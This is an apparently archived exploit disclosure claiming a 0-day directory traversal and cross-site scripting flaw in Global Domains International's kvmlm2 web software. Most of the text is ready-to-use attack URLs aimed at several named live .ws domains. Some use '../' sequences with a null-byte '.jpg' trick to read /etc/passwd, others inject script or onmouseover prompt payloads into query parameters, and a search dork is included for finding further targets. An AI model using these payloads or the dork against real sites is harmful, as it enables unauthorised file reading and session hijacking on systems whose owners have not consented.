Global Domains International Directory traversal Vulnerability 0-Day

2018.02.23

indoushka (DZ)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

====================================================================================================================================
| # Title : Global Domains International Directory traversal Vulnerability 0-Day |
| # Author : indoushka |
| # email : indoushka4ever@gmail.com |
| # Tested on : windows 10 Français V.(Pro) |
| # Vendor : http://www.nic.ws |
====================================================================================================================================
# Dork : Copyright © 2014 by Global Domains International, Inc · All Rights Reserved
http://www.nic.ws/kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11
https://www.website.ws/kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11
http://www.7.ws/kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11
http://www.movie.ws/kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11
http://welcome-back.ws/kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11
Cross site scripting (verified) :
/article.dhtml?article=touring&sponsor=wsnic%22%20onmouseover%3dprompt(771818860)%20bad%3d%22
/kvmlm2/index.dhtml?fname=1%22%20onmouseover%3dprompt(771818860)%20bad%3d%22&language=spanish&lname=&sponsor=gdi&template=11
/members/?language=english'%22()%26%25<ScRiPt%20>prompt(771818860)</ScRiPt>
/orderflow/index.dhtml?sponsor=1'%22()%26%25<ScRiPt%20>prompt(771818860)</ScRiPt>
http://freedom.ws/?language=french%27%22%28%29%26%25%3CScRiPt%20%3Eprompt%28771818860%29%3C/ScRiPt%3E
freedom.ws/show_dvd.dhtml?language=spanish'"()%26%25<ScRiPt >prompt(771818860)</ScRiPt>&sponsor=gditraffic
Greetz :----------------------------------------------------------------------------------------
|
jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic |
|
================================================================================================

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Global Domains International Directory traversal Vulnerability 0-Day

Dork: Copyright © 2014 by Global Domains International, Inc · All Rights Reserved

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.